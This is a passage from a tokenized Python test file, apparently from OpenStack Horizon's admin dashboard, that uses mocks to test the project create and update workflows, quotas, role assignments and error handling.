<EOL> "<STR_LIT:name>" : self . request . session . get ( '<STR_LIT>' , <EOL> default_domain . name ) } <EOL> return api . base . APIDictWrapper ( domain ) <EOL> def _get_all_users ( self , domain_id ) : <EOL> if not domain_id : <EOL> users = self . users . list ( ) <EOL> else : <EOL> users = [ user for user in self . users . list ( ) <EOL> if user . domain_id == domain_id ] <EOL> return users <EOL> def _get_all_groups ( self , domain_id ) : <EOL> if not domain_id : <EOL> groups = self . groups . list ( ) <EOL> else : <EOL> groups = [ group for group in self . groups . list ( ) <EOL> if group . domain_id == domain_id ] <EOL> return groups <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . base : ( '<STR_LIT>' , ) , <EOL> api . neutron : ( '<STR_LIT>' , ) , <EOL> quotas : ( '<STR_LIT>' , ) } ) <EOL> def test_add_project_get ( self ) : <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> api . neutron . is_extension_supported ( <EOL> IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( roles ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . get ( url ) <EOL> self . assertTemplateUsed ( res , views . WorkflowView . template_name ) <EOL> self . assertContains ( res , '<STR_LIT>' <EOL> '<STR_LIT>' , html = True ) <EOL> workflow = res . context [ '<STR_LIT>' ] <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] . name , <EOL> workflows . CreateProject . name ) <EOL> step = workflow . get_step ( "<STR_LIT>" ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , <EOL> quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . assertQuerysetEqual ( <EOL> workflow . steps , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> def test_add_project_get_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_get ( ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . neutron : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , ) } ) <EOL> @ test . update_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_add_project_get_with_neutron ( self ) : <EOL> quota = self . quotas . first ( ) <EOL> neutron_quotas = self . neutron_quotas . first ( ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . neutron . is_extension_supported ( <EOL> IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> api . neutron . tenant_quota_get ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( neutron_quotas ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( self . roles . first ( ) ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = None ) . AndReturn ( self . users . list ( ) ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . roles . list ( ) ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = None ) . AndReturn ( self . groups . list ( ) ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . roles . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertTemplateUsed ( res , views . WorkflowView . template_name ) <EOL> if django . VERSION >= ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> self . assertContains ( res , '''<STR_LIT>''' , html = True ) <EOL> else : <EOL> self . assertContains ( res , '''<STR_LIT>''' , html = True ) <EOL> workflow = res . context [ '<STR_LIT>' ] <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] . name , <EOL> workflows . CreateProject . name ) <EOL> step = workflow . get_step ( "<STR_LIT>" ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , <EOL> neutron_quotas . get ( '<STR_LIT>' ) . limit ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , <EOL> api . cinder : ( '<STR_LIT>' , ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_add_project_post ( self , neutron = False ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> if neutron : <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> project_details = self . _get_project_info ( project ) <EOL> quota_data = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_create ( IsA ( http . HttpRequest ) , ** project_details ) . AndReturn ( project ) <EOL> workflow_data = { } <EOL> for role in roles : <EOL> if USER_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ USER_ROLE_PREFIX + role . id ] <EOL> for user_id in ulist : <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = user_id , <EOL> role = role . id ) <EOL> for role in roles : <EOL> if GROUP_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ GROUP_ROLE_PREFIX + role . id ] <EOL> for group_id in ulist : <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = role . id , <EOL> group = group_id , <EOL> project = self . tenant . id ) <EOL> nova_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) <EOL> cinder_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . CINDER_QUOTA_FIELDS ] ) <EOL> api . cinder . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** cinder_updated_quota ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data . update ( self . _get_workflow_data ( project , quota ) ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> def test_add_project_post_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_post ( ) <EOL> @ test . create_stubs ( { api . neutron : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> @ test . update_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_add_project_post_with_neutron ( self ) : <EOL> quota_data = self . neutron_quotas . first ( ) <EOL> neutron_updated_quota = dict ( [ ( key , quota_data . get ( key ) . limit ) <EOL> for key in quotas . NEUTRON_QUOTA_FIELDS ] ) <EOL> api . neutron . is_extension_supported ( <EOL> IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . neutron . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> self . tenant . id , <EOL> ** neutron_updated_quota ) <EOL> self . test_add_project_post ( neutron = True ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_add_project_quota_defaults_error ( self ) : <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndRaise ( self . exceptions . nova ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . get ( url ) <EOL> self . assertTemplateUsed ( res , views . WorkflowView . template_name ) <EOL> self . assertContains ( res , "<STR_LIT>" ) <EOL> def test_add_project_quota_defaults_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_quota_defaults_error ( ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_add_project_tenant_create_error ( self ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> project_details = self . _get_project_info ( project ) <EOL> api . keystone . tenant_create ( IsA ( http . HttpRequest ) , ** project_details ) . AndRaise ( self . exceptions . keystone ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data = self . _get_workflow_data ( project , quota ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> def test_add_project_tenant_create_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_tenant_create_error ( ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_add_project_quota_update_error ( self ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> project_details = self . _get_project_info ( project ) <EOL> quota_data = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_create ( IsA ( http . HttpRequest ) , ** project_details ) . AndReturn ( project ) <EOL> workflow_data = { } <EOL> for role in roles : <EOL> if USER_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ USER_ROLE_PREFIX + role . id ] <EOL> for user_id in ulist : <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = user_id , <EOL> role = role . id ) <EOL> for role in roles : <EOL> if GROUP_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ GROUP_ROLE_PREFIX + role . id ] <EOL> for group_id in ulist : <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = role . id , <EOL> group = group_id , <EOL> project = self . tenant . id ) <EOL> nova_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) . AndRaise ( self . exceptions . nova ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data . update ( self . _get_workflow_data ( project , quota ) ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> def test_add_project_quota_update_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_quota_update_error ( ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . cinder : ( '<STR_LIT>' , ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_add_project_user_update_error ( self ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> project_details = self . _get_project_info ( project ) <EOL> quota_data = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_create ( IsA ( http . HttpRequest ) , ** project_details ) . AndReturn ( project ) <EOL> workflow_data = { } <EOL> for role in roles : <EOL> if USER_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ USER_ROLE_PREFIX + role . id ] <EOL> for user_id in ulist : <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = user_id , <EOL> role = role . id ) . AndRaise ( self . exceptions . keystone ) <EOL> break <EOL> break <EOL> nova_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) <EOL> cinder_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . CINDER_QUOTA_FIELDS ] ) <EOL> api . cinder . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** cinder_updated_quota ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data . update ( self . _get_workflow_data ( project , quota ) ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> def test_add_project_user_update_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_user_update_error ( ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_add_project_missing_field_error ( self ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data = self . _get_workflow_data ( project , quota ) <EOL> workflow_data [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertContains ( res , "<STR_LIT>" ) <EOL> def test_add_project_missing_field_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_missing_field_error ( ) <EOL> class UpdateProjectWorkflowTests ( test . BaseAdminViewTests ) : <EOL> def _get_quota_info ( self , quota ) : <EOL> cinder_quota = self . cinder_quotas . first ( ) <EOL> neutron_quota = self . neutron_quotas . first ( ) <EOL> quota_data = { } <EOL> for field in quotas . NOVA_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( quota . get ( field ) . limit ) <EOL> for field in quotas . CINDER_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( cinder_quota . get ( field ) . limit ) <EOL> for field in quotas . NEUTRON_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( neutron_quota . get ( field ) . limit ) <EOL> return quota_data <EOL> def _get_all_users ( self , domain_id ) : <EOL> if not domain_id : <EOL> users = self . users . list ( ) <EOL> else : <EOL> users = [ user for user in self . users . list ( ) <EOL> if user . domain_id == domain_id ] <EOL> return users <EOL> def _get_all_groups ( self , domain_id ) : <EOL> if not domain_id : <EOL> groups = self . groups . list ( ) <EOL> else : <EOL> groups = [ group for group in self . groups . list ( ) <EOL> if group . domain_id == domain_id ] <EOL> return groups <EOL> def _get_proj_users ( self , project_id ) : <EOL> return [ user for user in self . users . list ( ) <EOL> if user . project_id == project_id ] <EOL> def _get_proj_groups ( self , project_id ) : <EOL> return [ group for group in self . groups . list ( ) <EOL> if group . project_id == project_id ] <EOL> def _get_proj_role_assignment ( self , project_id ) : <EOL> project_scope = { '<STR_LIT>' : { '<STR_LIT:id>' : project_id } } <EOL> return self . role_assignments . filter ( scope = project_scope ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update_project_get ( self ) : <EOL> keystone_api_version = api . keystone . VERSIONS . active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> role_assignments = self . _get_proj_role_assignment ( project . id ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , <EOL> self . tenant . id , admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . get ( url ) <EOL> self . assertTemplateUsed ( res , views . WorkflowView . template_name ) <EOL> workflow = res . context [ '<STR_LIT>' ] <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] . name , <EOL> workflows . UpdateProject . name ) <EOL> step = workflow . get_step ( "<STR_LIT>" ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , <EOL> quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT:name>' ] , project . name ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT:description>' ] , <EOL> project . description ) <EOL> self . assertQuerysetEqual ( <EOL> workflow . steps , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . nova : ( '<STR_LIT>' , ) , <EOL> api . cinder : ( '<STR_LIT>' , ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update_project_save ( self , neutron = False ) : <EOL> keystone_api_version = api . keystone . VERSIONS . active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> proj_groups = self . _get_proj_groups ( project . id ) <EOL> roles = self . roles . list ( ) <EOL> role_assignments = self . _get_proj_role_assignment ( project . id ) <EOL> quota_usages = self . quota_usages . first ( ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , <EOL> self . tenant . id , admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . 